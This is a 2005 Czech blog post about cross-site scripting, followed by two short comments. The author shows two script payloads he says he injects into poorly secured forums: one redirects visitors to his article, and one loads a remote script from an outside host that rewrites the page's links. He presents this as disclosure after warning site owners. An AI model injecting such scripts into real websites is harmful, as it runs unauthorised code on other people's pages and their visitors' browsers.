Security leak

22. října 2005 v 20:32 | Joey |  Security

Chyba

Tato stránka slouží jen jako cíl pro jiné napadnutelné stránky. Pokud jste sem byli automaticky přesměrováni, má pravděpodobně zdrojový server problém se zabezpečením.

Použitý kód (varianta 1):
<script language="JavaScript">
<!--
window.location = "http://wwww.blog.cz/0510/security-leak";
//-->
</script>
Způsobí přesměrování stránky na tento článek.

Použitý kód (varianta 2):
<script language="JavaScript" src="http://renemihula.wz.cz/sp.js"></script>
Způsobí nahrazení všech odkazů za odkaz na tento článek. Lze použít bez uvozovek pokud je vkládaný text nahrazuje.

Jak?

Některé diskuse a jiné aktivní stránky na různých serverech mají problém se zabezpečením vkládaných textů a umožňují vložit i aktivní obsah. Pokud na takovou diskusi narazím, oznamuji správci stránek tento nedostatek a pokud jej opraví je vše v pořádku, pokud ne je namístě tuto situaci uveřejnit.

Proč?

Zdá se mi, že spousta rádoby programátorů odvádí velmi odfláknutou práci a pokud bude existovat podvědomí o potřebě bezpečnosti, bude to plus pro ty pečlivé.

EnJoey
 


Komentáře

1 MzK MzK | Web | 18. září 2006 v 18:27 | Reagovat

To snad není už nikde

2 Joey Joey | Web | 24. ledna 2007 v 16:07 | Reagovat

[1] Bohužel je to dost časté.

[2, 3, 4, 5] Puberta na Základní Škole U Nových lázní v Teplicích je dost krutá :) Taková silná slova tam používají, že jsem se až červenal.

Nový komentář

Přihlásit se
  Ještě nemáte vlastní web? Můžete si jej zdarma založit na Blog.cz.
 

Aktuální články

Reklama